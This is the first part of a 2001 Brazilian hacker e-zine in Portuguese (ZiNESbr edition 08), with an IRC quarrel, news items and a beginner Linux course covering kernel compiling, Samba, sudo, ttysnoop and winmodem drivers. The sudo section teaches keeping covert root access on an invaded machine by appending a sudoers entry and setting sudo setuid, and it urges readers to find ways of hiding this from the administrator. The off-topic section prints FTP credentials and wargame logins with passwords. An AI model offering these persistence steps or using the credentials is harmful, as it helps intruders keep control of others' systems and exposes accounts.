o..................................................................o
.ZZZZZZZZZZ  ..  NNNn    nNN EEEEEEE   sSSSSSS  bb        rrrrrrrr .
.ZzZ   ZZ    ""  NN NN    NN EEeeeee  sSSS  sSs bb         rr   rr .
.Zz   ZZ     ii  NN  NN   NN EE       sSS       bbB        rrrrrrr .
.    ZZ      ii  NN   NN  NN EEeE       sSS     bbbbbbbbb  rrrr    .
.   ZZ   zZ  ii  NN    NN NN EE           sSS   bb   Bbbb  rr rr   .
.  ZZ   ZzZ  ii  NN     NNNN EEeeeee SSs  sSSS  bbB   bbb  rr  rr  .
.ZZZZZZZZZz iiii NNn     nNN EEEEEEE  sSSSSSs   bbbbbbbbb rrr   rr .
o..................................................................o


.:x| Revista Virtual ZiNESbr   |x:.
.:x| Edicao 08                 |x:.
.:x| Data: 04/08/2001          |x:.
.:x| #ZiNESbr - Rede BrasNET   |x:.
.:x| http://zinesbr.hpg.com.br |x:.
.:x| zinesbr@ieg.com.br        |x:.

x Melhor visualizado no WordPad do Windows ou no VI do Linux  x
x Todo conteudo deste ZiNE sao para fins educativos           x
x Nao nos responsabilizamos por usos indevidos                x
                                 _________   ___
                                |         | |   |
                                | ZiNESbr |.|hpG|
                                | @#!?.* | |===|
                                |_________| |___|
                                     ||
                                .----------.  _/
                                |__________| (_)
                          ..........................
_____________________________________________________________________
'''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''''''
         *INDICE*                                   *AUTOR*

<<[00][ Introducao                             ][   Gotoxy    ][00]>>
<<[01][ Zinesbr Offtopic                       ][   Gotoxy    ][01]>>
<<[02][ Cursinho de Linux - Parte 8            ][   Gotoxy    ][02]>>
<<[03][ Basico de C III                        ][   Gotoxy    ][03]>>
<<[04][ Curso Assembly Parte II                ][   Gotoxy    ][04]>>
<<[05][ VB - Winsocks I                        ][   Gotoxy    ][05]>>       
<<[06][ Cracker Parte I                        ][   Gotoxy    ][06]>>
<<[07][ Mais sobre Sniffers                    ][  Ha0x-r00t  ][07]>>
<<[08][ Turorial do Portsentry                 ][   TankDS    ][08]>>
<<[09][ Guia de Visual Basic                   ][  Ha0x-r00t  ][09]>>
<<[10][ Phreaking Parte I                      ][   Backz     ][10]>>
<<[11][ Security Parte I                       ][   Gotoxy    ][11]>>
<<[12][ Engenharia Social                      ][   Backz     ][12]>>
<<[13][ Registro do Windows II                 ][   Protox    ][13]>>
<<[14][ Firewalls - Ip*                        ][   Gotoxy    ][14]>>
<<[15][ Perl - Circuitos Virtuais              ][    sort     ][15]>>
<<[16][ Mais Links                             ][   Kbytes    ][16]>>
<<[17][ Emails da Galera                       ][   ZiNESBr   ][17]>>
<<[18][ Ultimas palavras                       ][   Gotoxy    ][18]>>
_____________________________________________________________________
'''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''''''


SETOR [00]
==[ Introducao ]==
==[ por Gotoxy ]==

    Demorou denovo, mas chegou!:)  
    #############################

Eae meus amigos!!:) Com essa porra de racionamente, meu pai tah 
enchendo o saco aki de com forca, e portanto eu nao estou podendo
ficar muito tempo escrevendo textos para o publico alvo do zinesbr,
ou seja, os newbies fucadores. O zine demorou a sair tb porque eu
to numa banda aki com uns amigos e aih todo dia tenho q treinar...
eu sou o baxista, o Yuri eh o baterista, o Bruno (Aeeee!!:)) o 
vocalista e guitarrista!:) Qlq dias desses aih vcs vao ver nos na 
TV!!:) Mas... desculpe pela demora pessoal!!


A edicao 08 estah com um textos legais,espero que agrade ao leitores!
Na verdade, nao espero nada, leia se quiser, se nao quiser nao leia,
se gostar fodas, se nao gostar fodas tb! brincadeira =) 
O Evilman sumiu, e portanto nao fez a segunda parte do curso de 
Python! Evilman cade voce?:) Peco desculpas ao pessoal que estava
querendo aprender Python!


Agora, pessoal, por favor, envie textos! Estamos precisando de 
escritores. Nada de texbos bobos, tem que ser textos tecnicos 
de hacking etico (textos bobos que eu digo sao akeles que nao
tem valor, ou seja, textos que ensinam coisas inuteis para um
fucador). Mandar email e textos nao tem misterio!! Basta acessar
nosso site (http://zinesbr.hpg.com.br) e la tem um formulario.
(Isto , se existir uma edicao 09 do ZiNESbr! Leia mais sobre 
isso no 'Ultimas Palavras'). 


Eu e o Kbytes estavamos pensando se iamos continuar fazendo
zines, ou se iamos publicar novos textos ( textos separados ).
Acho que ficaria melhor... o kbytes ateh jah comecou no design
do novo visual do site do ZiNESbr!! Agora, o que nos falta eh
esperar e ver no que vai dar!!:) Fiquem atentos meu amigos..;)


Bem, entao eh isso veis..., Boa Leitura!!! =)

=====================================
Leia abaixo agora o Zinesbr Offtopic!  
=====================================
                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [01]
==[ Zinesbr Offtopic ]==
==[ por Gotoxy       ]==


##############
# Introducao #
##############

Iae pessoal?!:) Neste setor eu vou tratar de assuntos variados...
 meio foda de explicar do que se trata esse setor, mas l a q
voce entender!!


#####################
# Primeiro Assunto: #
#####################

struck manezao
--------------

--------------------------------------------------------------------------------

<struck> <Gotoxy> ftp ftp.hpg.com.br
<struck> <Gotoxy> login: ftpzinesbr
<struck> <Gotoxy> senha: zinesbr
<struck> foda.. o kra me da a senha da page dele
<struck> e eu mal conheco ele
<struck> q confianca as pessoas tem em mim
<struck> eu devo transmitir confianca pras pessoas...
<psaux> desfigura la
<psaux> hahaha
<struck> os kra devem olha pro meu nick: "Struck. Ah! ele parece ser um cara 
         confiavel.. vou dar minha senha pra ele."
<struck> tipo... a zine do kra plagiou mto a f3
<struck> zoia lah... zinesbr.hpg.com.br
<psaux> ou entao ele tah cagando e andando pra conta ftp dele
<psaux> hehehe
<struck> ele ateh rippou o henix e disse q ele fez um emulador de hacking 
         ZinesbrEmulator (ZE)...
<struck> foda...
<psaux> hehe
<psaux> vou mimi
<struck> falow psuco!
<psaux> =**
<psaux> t amanha
<struck> snape... ta ae kra?
<snape> sim
<struck> c tem q ver essa lamisse...
<snape> de quem?
<struck> esse kra rippou meu henix... e olha soh ele explicando os metodos de 
         ownar o Emulador dele...
<struck> um tal gotoxy
<struck> lha soh
<struck> [gotoxy@localhost /home/gotoxy]$ set
<struck> LOGNAME=gotoxy
<struck> [gotoxy@localhost /home/gotoxy]$
<struck> [gotoxy@localhost /home/gotoxy]$ export LOGNAME=root
<struck> [gotoxy@localhost /home/gotoxy]#
<struck> huahauhauhauaha
<snape> POTZ
<snape> set LOGNAME
<snape> export com outro nome
<snape> o cara eh zoado
<struck> mto
<struck> olha esse outro metodo...
<struck> [gotoxy@localhost /home/gotoxy]$ ls -la /etc
<struck> drwxr-r-x  16 root    root  666 Fev 23 2001 .
<struck> drwxr-r-x  16 root    root  666 Fev 23 2001 ..
<struck> rwxrwxrwx   1 root    root  666 Fev 23 2001 passwd
<struck> rwx------   1 root    root  666 Fev 23 2001 shadow
<struck> rwxrwx--x   1 root    root  666 Fev 23 2001 xploit
<struck> rw-r--r--   1 root    root  666 Fev 23 2001 inetd.conf
<struck> [gotoxy@localhost /home/gotoxy]$ /etc/xploit
<struck> [gotoxy@localhost /home/gotoxy]#
<struck> quem seria lamah o suficiente pra deixar um xploit no /etc???
<snape> o gotoxy
<snape> jaja
<snape> haha
<struck> hahaha
<struck> kra... da nojo ver o q fazem com meus progs...
<struck> ae o kra diz q vai largar o projeto e q c alguem quizer continuar pode
         faze-lo, mas ele nao vai liberar o source
<struck> hehehe.... ele publicou apenas o prog ja compilado...
<struck> pra nao mostrar q eh baita rippacao do henix
<snape> hahaha
<snape> bundao
<snape> que foda
<struck> a zine do kra tem um monte de materia plagiada da f3... eh foda...
<struck> mas curti issu pq parece q a zine ta ficando famosa
<struck> =)
<struck> ae snape! falow man!
<struck> te'manha
<snape> falou


--------------------------------------------------------------------------------


Encontrei este LOG na edicao 05 do zine fatal3rror, e..pow struck, puts,
nunca zuei nada contra vc kra, acho sua zine fantastica, e vc ainda erra 
desse jeito comigo kra?! foi vacilo de sua parte kra...e pq vc nao 
colou o LOG completo? para quem nao percebeu, o login eh ftpzinesbr,
portanto, o site seria www.ftpzinesbr.hpg.com.br...para os script-kiddies
(como por exemplo o psaux) que tentaram hackear o site do zinesbr, levaram
ferro!! struck kra, esse ftp q eu te passei, nao foi soh para vc nao,
foi para os todo mundo q tava no irc, execeto para os "estranhos",...
o q tinha nesse ftp era apenas a edicao 06 do zinesbr q ainda nao tava
publicada no site, mas q aih um mano meu criou esse ftp e pediu para eu
downloada-la pra la para os kras q tavam no #zinesbr pegar...nada mais,
tu deu mancada, errou...

sobre o emulador, eu nao publiquei o source pq senao iriam descobrir
facilmente como pegar root, mas nao copiei nem uma virgula da fonte
do henix...o ze foi feito em pascal, e nao em C..e nao vi nenhum 
codigo do henix em pascal.. quem viu o henix e o ze perceberam q
os dois nao tem nada a v um com o outro... e eu disse liberaria o codigo
para quem quisesse botar mais coisas no codigo! eu copiei a ideia,
mas nao o codigo!! ahhhh... ainda tu disse q eu ripo seus textos....

bah, mais uma vez, tu errou!!

deu para perceber q vc soh busca fama, assim como esses script-kidies,
tais como esse tal de psaux, q baba seu ovo e owna pages...struck
tu pisou na bola comigo, sempre te respetei...mas tu errou! e daki
para frente vai ser diferente... 


####################
# Segundo Assunto: #
####################

Cygwin 
------

Para quem usa Windows, e q eh doido para mecher num linux, mas
nao instala pq nao tem nenhuma distribuicao linux ou que tem mas como
o pc eh do pai, nao pode instalar, etc... eu tenho uma solucao!!

voce pode usar um programa conhecido como Cygwin, produzido por uma
empresa chamada Cygnus Solutions, o qual portou a versao unix para
a interface win32.

o cygwin parece mais um emulador de linux, mas nao eh..na pcmaster
edicao 50, teve uma materia sobre o msm, e la diz q este programa
utiliza um conjunto de APIs especiais e q se pode portar codigos
feitos no lnx e recompila-lo no windows (mas eles dizem q este
processo nao eh tao simples assim pq diversas libs ainda nao 
foram convertidas para o formato win32).

o cygwin eh meio grandezin... recomendo vc pegar o programa conhecido
como netants (www.netants.com) para fazer o download do msm, q
por sua vez pode ser encontrado em www.cygwin.com.

eu testei ele aki e achei ele muito rlz...muitos programas, muitos
howtos, etc.. ele ainda possui compiladores, tais como o GCC (para
compilar programas feitos em C), o Perl (para executar programas
feitos em perl) e o AS (compilar programas feitos em Assembly)...
jah deu para perceber como eh um programa sofisticado, nao eh 
msm? pois eh.. entao, se vc tem o windows 9x, ou o NT, ou o 2000
ai, recomendo a instalacao dele...

entao eh isso ! []s
 

#####################
# Terceiro Assunto: #
#####################

Nova zine
---------

galera, to aki para avisar de um novo zine q surgiu aih na area!!
o nome do zine eh Breaking to Head, ou seja, Quebrando a Cabea,
cujo autor eh o Hophet (aeee irmao!!) ....

a edicao 00 foi lancada aih e pode ser encontrada no seguinte
site:

http://www.bthzine.cjb.net/

vlw hophet e continue assim manu!! a edicao 00 ficou 10...e
esperamos (nos, os leitores) q a edicao 01 fique bem melhor
e q cada edicao melhore cada vez mais!!!


entao eh isso,
[]s kra!!

###################
# Quarto Assunto: #
###################

Distribuicao Linux
------------------

Slackware 8.0 chegou no mercado...e todos seus pacotes foram 
atualizados. Kernel 2.2.19 e 4.2.5 (vc pode instalar um ou
outro). Se voce gosta de slack (minha distribuicao favorita),
recomendo a compra do mesmo, pois vale a pena!

Voce pode pega-lo no site do slackware mesmo:
www.slackware.com

ou entao pagar 9,90 pelo CD, comprando ele no site da linuxmall:
www.linuxmall.com.br
 
Ou entao vc pode aguardar um pouco, pois daki a pouco alguma
revista (tais como Pcmaster/Revista do Linux, entre outras)
devem distribuir o Slack 8.0! Paciencia...paciencia!!:)

###################
# Quinto Assunto: #
###################

Scan de Mp3s
------------

Se vc esta tendo problemas com o Napster, utilize outros
programas q tem a msm finalidade: achar mp3s automaticamente
para voce!

um bom prog deste tipo eh o WinMX
pegue ele em: http://www.superdownloads.com.br

um outro bom tb eh o LimeWire
pegue ele em: http://www.limewire.com
o limewire alem de procurar mp3s, ele procura videos, entre
outras coisas! ele acha essas coisas via routers, e portanto,
nao pode ser julgado como um programa ilegal.

quem nao curtes uns mp3s?? codar ouvindo musicas eh uma das
melhores coisas q tem!!:)

##################
# Sexto Assunto: #
##################

Desafio Lockabit 
----------------

IP ->> 146.164.32.69

Login      Senha 
     
nivel0     Gustavo
nivel1     GusTavO
nivel2     AllYourBase
nivel3     FearOfTheDark!
nivel4     Mr.Feldman
nivel5     BelongToUs
nivel6     OpenRulez
nivel7     MoneyForNothing

by m4rc3l0

###################
# Setimo Assunto: #
###################

fim de assuntos galera!!!
flw!!



==============================================
Leia abaixo agora o Cursinho de Linux Parte 8!
==============================================      
                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [02]
==[ Cursinho de Linux - Parte 8 ]==
==[ por Gotoxy                  ]==

t0pics:
1. Introducao
2. Compilando o Kernel 
3. Samba 
4. Kernel
5. Sudo
6. Manual do TTYSNOOP
7. WinModems
8. Fim 

--------------- ## --------------- ## --------------- ## ---------------

 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 1 |_________________|     INTRODUCAO      |_________________| 1 |
|___|                 |                     |                 |___|
                      `---------------------'                  

Mais um cursinho de Linux. Com este, temos ao todo 8 cursos. Nessa
introducao, vou deixar bem claro uma coisa: este simples/basico
curso de linux eh voltado para as pessoas que estao comecando a
mecher no Linux, e portanto, nao eh util para quem conhece o basico
do mesmo. Se voce acha que jah sabe o basico, entao pule esta parte
caro leitor, pois aqui nao tem nada de novo para voce!:) 


 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 2 |_________________| Compilando o Kernel |_________________| 2 |
|___|                 |                     |                 |___|
                      `---------------------'                  

##############################
##  Por Morfeu              ##
##  E-mail - morfeu@mail.ru ##
##############################

dae pessoal... to aqui contribuindo com um texto sobre como compilar
o kernel do seu linux. nao fui eu que fiz, eu somente alterei.
leia com atencao e boa sorte!


O Kernel  a camada mais interna do sistema operacional, o ncleo,
e  nessa camada que existe a interao do software com hardware
do computador. Como o Linux, o kernel est sob os termos do GNU 
General Public License, ou seja, pode ser distribudo gratuitamente
com todo o seu cdigo-fonte. Este, pode ser modificado desde que suas
alteraes no cdigo dele sejam tambm distribudas gratuitamente com
seu cdigo-fonte. Originalmente, o kernel do Linux foi escrito por Linus
Torvalds e melhorado por milhares de programadores no mundo inteiro com 
o decorrer do tempo.

-  Recompilando Kernel passo a passo:

bash# cd /usr/src
 Entra no diretrio onde o kernel vai ser instalado.

bash# rm -rf linux
 Apaga o kernel antigo.

bash# tar xvfz /onde-ele-estiver/linux-2.2.17.tar.gz
 Descompacta o arquivo do kernel novo que voc pegou.

bash# ln -s linux-2.2.17 linux
 Cria um link no diretrio /usr/src/linux.

bash# cd linux
 Entra no diretrio do kernel.

bash# make menuconfig
 Entra em um menu grfico onde voc deve configurar os suportes e
 opes que desejar utilizar.

bash# make dep
 Compila o kernel.

bash# make clean
 Apaga os arquivos que no sero necessrios na compilao.

bash# make bzImage
 Compila o kernel.

bash# cp /usr/src/linux/arch/i386/boot/bzImage /boot/vmlinux
 Copia a imagem do kernel para o diretrio /boot.

bash# make bzdisk
 Compila o kernel, use se quiser fazer um disco de boot do kernel.

bash# make bzlilo
 Compila o kernel, use apenas se voc utiliza o LiLo.

bash# make modules
 Compila os mdulos.

bash# make modules_install
 Compila os mdulos.

bash# lilo
 Salva qualquer modificao no LiLo, use apenas se estiver usando o
 LiLo.

bash# init 6
 Reinicia o sistema.

Obs.: nesse exemplo acima foi utilizado como exemplo a compilao do
kernel 2.2.17, modifique para o kernel que voc for compilar.

Agora se voc quer recompilar seu kernel sem a atualizao, somente para
reconfigurar ele, proceda assim:

bash# cd /usr/src/linux
bash# make menuconfig
bash# make dep
bash# make clean
bash# make bzImage
bash# cp /usr/src/linux/arch/i386/boot/bzImage /boot/vmlinux
bash# make bzdisk
bash# make bzlilo
bash# make modules
bash# make modules_install
bash# lilo
bash# init 6


 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 3 |_________________|        SAMBA        |_________________| 3 |
|___|                 |                     |                 |___|
                      `---------------------'                  

Vou falar agora o que vem a ser o SAMBA. Pois, ele eh muito usado
em redes por muitos usuarios Linux. Antes de comecar, aviso: este
texto sobre o samba eh apenas para dar uma introducao a ele, e nada
mais alem disso. 


###############
O que eh SAMBA?
###############

SAMBA eh um servico que serve para voce acessar os outros computadores
Windows que fazem parte de sua rede. Ele utiliza o protocolo SMB (Server 
Message Block) e possui dois daemons: smbd (/usr/sbin/smbd) e o nmbd 
(/usr/sbin/nmbd) (se voce for instalar o SAMBA aih, eh preciso q estes
dois daemons estejam ativos)

###################
Onde pegar o Samba?
###################

Voce pode encontra-lo em: www.samba.org

###############
Ferramenta Swat
###############

Swat (Samba Web Administration Tool)

O Swat eh um programa muito rulah q permite q vc controle (administre)
o Samba via browser. Mas para que ele funcione, eh preciso q vc tenha
um servidor WEB funcionando na sua makina (como o Apache).


####################
Util, porem perigoso
####################

Foi encontrado um grande problema no SAMBA, o qual usuarios
remotos podem tirar proveito e pegar root na makina alvo!
Para saber mais, visite: www.securityfocus.com

As versoes do Samba vulneraveis, e as distribuicoes que
correm perigo, voce encontra falando no site da security
focus!

Solucao: pegar a ultima versao do mesmo, que provavelmente
ja deve estar livre desse bug.

 
###########
END END END
###########

Acho que o basico sobre o samba voce jah sabe! Se quiser 
obter mais conhecimentos sobre ele, basta acessar o seu
site (www.samba.org). Tem tambem um texto sobre o mesmo
cujo pode ser encontrado em unsecurity.org!


 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 4 |_________________|       KERNEL        |_________________| 4 |
|___|                 |                     |                 |___|
                      `---------------------'                  

Aki, no oitavo cursinho de linux, o Morfeu nos enviou um texto de
como compilar o kernel (valeu manuu!!). Mas eu acho que muitos nao
entendem direito o q eh o Kernel do Linux, portanto, faco este 
textinho, explicando algumas coisas...

###############
O que eh Kernel
###############


Resumidamente falando, o Kernel eh o nucleo do SO (sistema operacionl).
Ele interage como intermediario entre o hardware e os softwares. Uma
de suas funcoes eh gerenciar a fatia de tempo utilizada por cada 
processo (conhecido como timeslice ou quantum). Uma outra funcao do
Kernel eh gerenciar toda a memoria do SO e gerenciar todos os 
dispositivos conectados a ela (como por exemplo o mouse, teclado,etc.).

##########################
Porque recompilar o Kernel
##########################

Novas versoes de Kernels sempre oferecem varios novos recursos... um
exemplo disso sao os drivers, pois sempre que uma nova versao de kernel
eh lancada, ela vem com muitos mais drivers do que a anterior. Mas
nao eh soh isso!! Novas versoes corrigem falhas que a versao anterior
possuia. Tambem em novas versoes, drivers desnecessarios sao removidos, 
otimizando assim o tempo de inicializacao. Bem, sao varias as vantanges.
Saiba apenas que eh uma grande vantagem atualizar seu kernel..:)

#########
Last Word
#########

Kbo!


 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 5 |_________________|        SUDO         |_________________| 5 |
|___|                 |                     |                 |___|
                      `---------------------'                  

PROGRAMA: SUDO

Neste texto vou mostrar como o executavel sudo eh muito util para
nos, fucadores. "O que eh sudo? Praque ele serve? " Estas e outras
perguntas serao respondidas no decorrer do texto, portanto, leia
agora mesmo e tire suas duvidas e conclusoes!:)

Apos voce pegar root na maquina, veja se o sistema possui o
programa sudo. Como? Digite na shell: 

# sudo 
ou
# whereis sudo

Caso apareca alguma coisa, entao tem o sudo na maquina. Apos isso,
entre no diretorio /usr/bin e veja se o sudo esta setado com o bit
suid. Para isso, faca:

# cd /usr/bin
# ls -la sudo

---s--x--x   1 root     root        77444 Jun 18  2000 /usr/bin/sudo*

   |
   |
   `-- caso tenha este 's', ele esta setado com o bit suid.E portanto,
voce tera permissoes de executar comandos root como user normal.
Caso ele nao esteja setado com o bit suid, entao voce nao terah 
privilegios elevados no sistema. Veja:

$ sudo ls /root
Sorry, sudo must be setuid root.
$

Aih nao terah jeito de voce utilizar o sudo para seus objetivos.
Mas levando em conta que voce pegou root na makina alvo, basta
digitar

# chmod +s /usr/bin/sudo

e seus problemas estarao resolvidos!:)

Antes de continuar falando do sudo, deixe eu dizer o que vem a 
ser sudo. Este programa, eh nada mais nada menos do que um programa
que voce pode executar comandos root como usuario normal. O arquivo
de configuracao do sudo eh o /etc/sudoers e voce pode edita-lo 
bastando digitar "visudo" (sem aspas) na shell. Podemos tirar muito
proveito com este programa (sudo), e portanto, vou mostrar uma 
maneira para isso.

Veja este simples, porem util, programa abaixo:

--------------------------------- cmd.sh ---------------------------------

#!/bin/sh
echo "user    ALL=(ALL) ALL" >> /etc/sudoers
 
--------------------------------------------------------------------------

Substitua "user" por um usuario valido da maquina que voce rootou.
Bem, agora digite os seguintes comandos:

# chmod a+x cmd.sh
# ./cmd.sh

O que vem a ser este programa? Ele apenas deixa o usuario "user" que voce
especificou com o uid 0. Ou seja, voce poderah fazer tudo que o root pode
fazer no sistema.

Agora logue-se no sistema invadido como usuario normal (o "user" que voce
especificou no /etc/sudoers) e depois digite:

$ ls /root
/bin/ls: /root: Permission denied

Bem, assim nao teria jeito neh?! Mas, e se usassemos o sudo para nossos
objetivos? 

$ sudo ls /root
Password: 

Programas                Sources      Asm             Textos
Security                 darkstar     Elfs            Games
Howtos                    piTs        loadlin16a.txt  Others
loadlin16a.zip           coders       mbox 

$

Viva!! Listamos o que tem no diretorio do root. Ah! O password
que eh pedido apos executar o sudo, eh o password do usuario
que voce logou no sistema e nao do root, ok?

Para mais informacoes, man sudo!

Ah! Leia tambem um texto que o Nash Leon fez sobre Expand Overflow.
Voce pode encontra-lo em http://unsekurity.virtualave.net

Termino por aqui.
       

Ops, antes de terminar, gostaria de avisar uma coisa.Se o 
Administrador digitar "visudo" ou "vi /etc/sudoers" e ver
que tal user esta tendo permissoes elevadas no sistema,ele 
tomarah as providencias necessarias imediatamente e aih bau 
bau! Mas ha maneiras de se evitar isso.Como? Hmm..agora eh
com voce! Mostre seus conhecimentos e tenha isso como um
desafio! Boa sorte com este desafio meu caro, e lembre-se,
nao desista! 
"Lembre-se: tudo eh facil,voce que o torna complicado." 

Ah!! Uma ultima coisa. Quando fiz esse textinho aki, levei
em conta os seguintes aspectos:

* "Eu" peguei root na maquina alvo usando a tecnica X, e tirando
proveito da falha Y. Mas se o Administrador arrumar a falha
Y, eu nao terei jeito de usar a tecnica X para pegar root.
Mas aih eu terei o sudo para ter privilegios root, sem mesmo
usar tecnicas como a X, para pegar root. 

* O Administrador da maquina invadida nao tem conhecimentos
em usar o programa sudo e nao entende nada do mesmo.Portanto,
poderei ter privilegios root como usuario normal usando o
sudo, sem me preocupar com o Administrador.

* O usuario 'fulano' tem uma shell na maquina invadida pelo
hacker.E o user 'fulano' nunca ouviu falar em sudo. Aih o
hacker pega a senha do 'fulano' e acessa o sistema invadido
e usa o sudo para ter privilegios root. Sendo assim, o ADM
nao acharah estranho pois o 'fulano' eh um user confiavel.
Ah! Levando em conta que o ADM tb nunca ouviu falar em sudo.

Acho que deu para voce entender +/- a arte de se usar o 
sudo, ou nao?:)


 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 6 |_________________|  Manual do TTYSNOOP |_________________| 6 |
|___|                 |                     |                 |___|
                      `---------------------'

##############################
##  Por Morfeu              ##
##  E-mail - morfeu@mail.ru ##
##############################

Sistema utilizado: Slackware Linux 7.1

* Requisitos:
 1. Conhecimento basico em linux
 2. Que voce ja tenha aberto uma shell

Eu uso linux faz pouco tempo e me interessei em abrir contas shell pra
que alguns amigos que nao usam linux pudessem rodar ferramentas no meu
sistema. Mais como nem todos sao amigos, pensei se nao tinha um tipo de
monitor de log em tempo real para que eu tivesse um controle maior sobre
o que o usuario de minha shell digita... Fiquei sabendo do ttysnoop la
no #linuxall da brasnet mais o cara so falou pra mim que existia e me
mandou ler o manual e ler o inetd.conf ao inves de me explicar passo
a passo a sua utilidade.

ttysnoop eh uma ferramenta que ja vem com o linux e sua utilidade eh
espionar uma ou mais tty do seu linux. Eh de uso indispensavel pra
quem costuma abrir shell. Ele permite que voce veja o que o usuario
esta digitando na sua shell. Inclusive, voce tem controle sobre o que
esta sendo digitado. Ex.: se voce escreve "exit" no ttysnoop, vai
aparecer "exit" na shell do seu usuario e quando voce pressionar ENTER
voce fechara a shell. entendeu? eh como se voce fosse o cliente da sua
propria shell... Eh facil facil usar... depois que voce comecar vai
entender melhor do que eu to falando... :)

Para habilitar esse servico voce edita o arquivo /etc/inetd.conf e
adiciona a seguinte linha:

 telnet stream tcp nowait root /usr/sbin/tcpd in.telnetsnoopd

Depois edita o arquivo /etc/snooptab e adiciona as seguintes
linhas la no inicio do arquivo:

 ttyp0 /dev/tty5 login /bin/login
 ttyp2 /dev/tty6 login /bin/login

Com isso o ttysnoop ja vai estar habilitado. Agora pra voce poder
testar a ferramenta voce deve reiniciar o inetd. O comando eh
"killall -HUP inetd". Feito isso de uma forma ou outra, voce deve
se conectar na sua shell com um usuario que voce deve criar la no
menu K, System e depois no User Manager no KDE. Ou cria da forma
que voce sabe, o importante eh ter um usuario para voce poder
testar o ttysnoop.

Agora faz isso:

root@darkstar:~# telnet localhost

 Trying 127.0.0.1...
 Connected to localhost.
 Escape character is '^]'.

darkstar login:

Digita o login (usuario) que voce criou la no User Manager e a senha.
Pronto! voce esta conectado!
Agora abra outra janela do terminal e digite assim:

ttysnoop ttyp0

Aparecera isso:

 root@darkstar:~# ttysnoop ttyp0

 Connected to ttyp0 snoop server...
 Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
 Snoop password:

 Agora voce deve digitar a sua senha de root
 Se a senha estiver correta, aparecera isso:

 Verified OK... Snoop started.

Pronto! agora digita qualquer coisa no terminal onde o ttysnoop esta
aberto e veja que na outra janela do terminal (onde voce se conectou
em voce mesmo) vai aparecer essa "qualquer coisa" digitada no ttysnoop!
A partir dae eh soh voce monitorar os usuarios de sua shell...
Para pegar uma segunda pessoa que esteja conectada em sua tty, ao
inves de digitar ttysnoop ttyp0 voce digita ttysnoop ttyp1

Fim.

* Recomendacoes

 http://www.linuxall.org
 http://www.linuxzone.com.br
 http://www.zinesbr.hpg.com.br
 http://www.code190.hpg.com.br
 http://unsekurity.virtualave.net
 http://morfeu.hypermart.net

* IRC ( irc.brasnet.org )

 #linuxall
 #linux4ever
 #linuxinfo

* Obs.: este texto eh um resumo de todos os textos que eu li sobre
o assunto. Nao sou o criador, apenas resumi todos os textos e
acrescentei coisas que adiquiri fucando no ttysnoop. Para maiores
informacoes, consulte o manual: man ttysnoop

* Meu desabafo: ae... sabe... quando eu nao usava linux eu me sentia
meio burro por nao usar e fiquei ate com raiva do linux e dos usuarios
do mesmo (ahuuaua que idiotisse). Mais depois que consegui instalar e
comecei a usar eu percebi que nao sou burro (hehehe) e que o linux eh
tao maravilhoso que cada vez que voce inicia ele voce aprende mais,
mesmo que seja um simples comando, mais SEMPRE voce aprende mais
alguma coisa (pelo menos eu sou assim). Realmente, o linux nao eh soh
um sistema operacional, eh um ESTILO DE VIDA!!!

* If you want to travel around the world and be invited to speak at a
lot, or different places, just write Unix operating system.

- Linux Torvalds


 ___                  .---------------------.                  ___
|   |_________________|                     |_________________|   |
| 7 |_________________|     WINMODEMS       |_________________| 7 |
|___|                 |                     |                 |___|
                      `---------------------'                  

###########################
## Autor: Zoad           ##
## Email: zoad@globo.com ##
###########################


#############################
# Como Funciona um WinModem #
#############################

Os Winmodems saun controlados atraves do sistema operacioanal, assim, 
precisam de um software fornecido pelo fabricante para funcionar.
Explicando melhor, esse tipo de dispositivo naun executa modulacao 
e demodulacao de dados por hardware, ele faz isso por software. 
Assim o processador eh q fika responsavel por isso, o que faz com que
o computador perca desempenho quando o modem esta sendo utilizado.
Os Winmodems fikaram muito populares aki no Brasil devido ao seu baixo 
custo,assim muita gente que tinha um Pentium 133 ou superior e naun
possuia modem, akabo adquirindo um Winmodem e ele tbm foi largamente 
utilizado em placas-maes que possuem Modem onboard.

######################
# WinModems no Linux #
###################### 

Embora os Winmodems tenham sido criado para SO Windows, eh possvel 
utilizar Winmodems no Linux. Para isso, vc tera que instalar drivers, 
que ainda pokos fabricantes disponibilizam. Utilizar Winmodems no 
Linux faz com que o desempenho da maquina caia muito, mas se mesmo
assim vc quer instalar ai vai os procedimentos, irei ensinar instalar 
Winmodems com os seguintes chipsets: Motorola, Lucent, PCTEL. Existem 
outras marcas mas estas saun as mais populares aki no Brasil. Os 
testes foram feitos com o SO Red Hat 7.1 com o kernel 2.4.

######################
# WinModems Motorola #
######################

Para instalar o Winmodem da Motorola faca o seguinte:

1) Baixe o driver. Ele esta disponivel em: 
http://e-www.motorola.com/products/softmodem/support/sm56_5.1_i386.rpm

2) Copie o driver para o diretorio (/root) e de o seguinte comando:

#rpm -Uvh sm56_5.1_i386.rpm 
#sm56setup [country-code]

Ps: Em country-code coloke o codigo do Brasil que  55!!! :-))

Pronto!!! Seu Winmodem Motorola esta instalado, agora eh so testar!!!

####################
# WinModems Lucent #
####################

Agora veja como instalar Winmodems com o Chipset Lucent.

1) Faca o download do driver. Ele esta disponivel em www.linmodems.org,
pow eh so procurar, fikei com preguica de ir pegar a url certinha!! :-))

2) Copie o driver para o diretorio (/root) e descompacte-o com o 
comando:

#gunzip driverLucent.zip

3) Abra o arkivo ltinst com um editor de textos. A primeira linha eh a 
porta COM utilizada pelo Modem. voce deve modifica-la com o parametro 
da sua makina, veja a tabela:

################################
# MS DOS ####       LINUX      #
################################
#  com1  #### cua0= /dev/ttyS0 #
#  com2  #### cua1= /dev/ttyS1 #
#  com3  #### cua2= /dev/ttyS2 #
#  com4  #### cua3= /dev/ttyS3 #
################################

4) Depois de configurar a porta e salvar o arkivo, execute o seguinte 
comando para instalar o driver:

#./ltinst


Pronto!!! Seu WinModem com chipset Lucent esta instalado... :-))

###################
# WinModems PCTEL #
###################

